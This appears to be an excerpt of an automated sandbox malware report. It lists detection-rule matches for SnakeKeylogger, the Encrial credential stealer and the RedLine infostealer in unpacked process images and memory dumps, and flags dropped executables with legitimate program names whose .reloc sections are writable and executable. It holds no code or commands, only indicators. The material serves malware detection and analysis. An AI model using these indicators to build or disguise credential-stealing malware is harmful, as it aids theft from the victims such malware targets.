                  Source: 15.2.RegSvcs.exe.2d30ee8.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.RegSvcs.exe.3f0f990.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.3f0f990.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.RegSvcs.exe.2a41f6e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.2a41f6e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.RegSvcs.exe.5360000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.5360000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.RegSvcs.exe.3ee6458.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.3ee6458.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.RegSvcs.exe.2a41086.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.2a41086.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 4.2.differences.exe.3ee0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 15.2.RegSvcs.exe.5360000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.5360000.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.RegSvcs.exe.2d30000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.2d30000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.RegSvcs.exe.2d30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.2d30000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.RegSvcs.exe.3f0f990.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.3f0f990.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.RegSvcs.exe.3ee5570.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.3ee5570.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 12.2.differences.exe.3ee0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 15.2.RegSvcs.exe.2a41086.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.2a41086.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000C.00000002.1924522530.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000004.00000002.1762544925.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000A.00000002.1905647858.0000000004080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: x.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVClient.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: armsvc.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: differences.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: alg.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3_x64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SciTE.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jjs.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jp2launcher.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: keytool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: kinit.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: klist.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ktab.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AdobeARMHelper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: orbd.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jaureg.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pack200.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jucheck.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: policytool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jusched.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleCrashHandler.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleCrashHandler64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7z.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7zFM.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmid.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmiregistry.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: servertool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssvagent.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: tnameserv.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: unpack200.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ie_to_edge_stub.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: cookie_exporter.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: identity_helper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: setup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7zG.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Acrobat.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcrobatInfo.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: acrobat_sl.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AcroCEF.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedgewebview2.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
